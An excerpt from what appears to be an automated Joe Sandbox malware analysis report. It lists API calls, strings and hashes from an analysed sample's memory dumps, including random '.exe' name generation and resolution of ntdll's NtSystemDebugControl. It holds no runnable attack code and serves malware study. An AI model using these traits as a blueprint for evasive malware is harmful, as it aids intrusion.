                                                                                                                  • Instruction Fuzzy Hash: 76E0D877A04218BBD700ABF9EC4689EBFACDE85162B110537F600D3254F570FD448AB8
                                                                                                                  APIs
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,004A29DB,?,00000001), ref: 004A26A7
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,004A29DB,?,00000001), ref: 004A26B5
                                                                                                                  • lstrlen.KERNEL32(?), ref: 004A26C4
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 004A26CE
                                                                                                                  • lstrcpy.KERNEL32(00000004,?), ref: 004A26E3
                                                                                                                  • lstrcpy.KERNEL32(?,00000004), ref: 004A271F
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004A272D
                                                                                                                  • SetEvent.KERNEL32 ref: 004A273C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 41106472-0
                                                                                                                  • Opcode ID: b5e46d9cc989f1a7b57703141c2f92353253138e211bedf5c27afe10918dced7
                                                                                                                  • Instruction ID: 77e37d32be14d0488f5cf42d7ece11076c88d315ac3d83a435b86241d6193174
                                                                                                                  • Opcode Fuzzy Hash: b5e46d9cc989f1a7b57703141c2f92353253138e211bedf5c27afe10918dced7
                                                                                                                  • Instruction Fuzzy Hash: F411BE39404100EFCB219F19EE4885F7FA9FBE3721720403AF45587220E7B48E81EB58
                                                                                                                  APIs
                                                                                                                  • srand.MSVCRT ref: 004A1BCD
                                                                                                                  • rand.MSVCRT ref: 004A1BD8
                                                                                                                  • memset.MSVCRT ref: 004A1C43
                                                                                                                  • memcpy.MSVCRT(?,OQVwJMDijGEsBvlSNYIfTzxdNAbivRhZrguobSKndIkcDrqedQLBbFrjXeStDvwFcUloZqypgKUztylJLCpIesMVFOZauWLxhXztmaxkqskphoOWVGPjWQmEKnANCfXwPMTHCTUAGHyYuRBRYngcJaimPHfE,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 004A1C4F
                                                                                                                  • lstrcat.KERNEL32(?,.exe), ref: 004A1C5D
                                                                                                                  Strings
                                                                                                                  • .exe, xrefs: 004A1C57
                                                                                                                  • OQVwJMDijGEsBvlSNYIfTzxdNAbivRhZrguobSKndIkcDrqedQLBbFrjXeStDvwFcUloZqypgKUztylJLCpIesMVFOZauWLxhXztmaxkqskphoOWVGPjWQmEKnANCfXwPMTHCTUAGHyYuRBRYngcJaimPHfE, xrefs: 004A1B8A, 004A1B9C, 004A1C15, 004A1C49
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcatmemcpymemsetrandsrand
                                                                                                                  • String ID: .exe$OQVwJMDijGEsBvlSNYIfTzxdNAbivRhZrguobSKndIkcDrqedQLBbFrjXeStDvwFcUloZqypgKUztylJLCpIesMVFOZauWLxhXztmaxkqskphoOWVGPjWQmEKnANCfXwPMTHCTUAGHyYuRBRYngcJaimPHfE
                                                                                                                  • API String ID: 122620767-1997809253
                                                                                                                  • Opcode ID: c7401e173ce03c995490744a6a38f662c0ca1dd908d18e44c9847fdf1e6d6fe3
                                                                                                                  • Instruction ID: 65ff7c890e4c6fabd7bb436ba0ad02a6cb0d543a433327bad9ec3f07f2a59f3f
                                                                                                                  • Opcode Fuzzy Hash: c7401e173ce03c995490744a6a38f662c0ca1dd908d18e44c9847fdf1e6d6fe3
                                                                                                                  • Instruction Fuzzy Hash: A2215E22E441906ED32513356C41BAF7F448FF7721F5540BBF5852B2F2E1AC1985827C
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 004A1334
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004A133B
                                                                                                                  • memset.MSVCRT ref: 004A1359
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcmemset
                                                                                                                  • String ID: NtSystemDebugControl$ntdll.dll
                                                                                                                  • API String ID: 3137504439-2438149413
                                                                                                                  • Opcode ID: c1fc95627657b0455e76d8d5c30de3dda043eaf3ff7eaf721f62b4da211075cf
                                                                                                                  • Instruction ID: 582ba7ce8f8960751808e02cf775ee87b93dd1f8f781d2c6873c7d6d46bbea07
                                                                                                                  • Opcode Fuzzy Hash: c1fc95627657b0455e76d8d5c30de3dda043eaf3ff7eaf721f62b4da211075cf
                                                                                                                  • Instruction Fuzzy Hash: D2016171600309BFEF10DFA4AC85A6FBB6CFB62315F00413BF941A1550E3B48655CB59
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3636361484-0
                                                                                                                  • Opcode ID: 7cf949a81b1b9ca4a23e5cb29efecc56799d0d5ed5e3ed34810011b8376bb6ad
                                                                                                                  • Instruction ID: e56c615296eaf1c3b327442f56ef169f187d402bc47d242fe118764a0df5eaa9
                                                                                                                  • Opcode Fuzzy Hash: 7cf949a81b1b9ca4a23e5cb29efecc56799d0d5ed5e3ed34810011b8376bb6ad
                                                                                                                  • Instruction Fuzzy Hash: 2501DB729082156FDB105B60DC48BD77BDCDB16351F040077E945D2090E6B89E848B98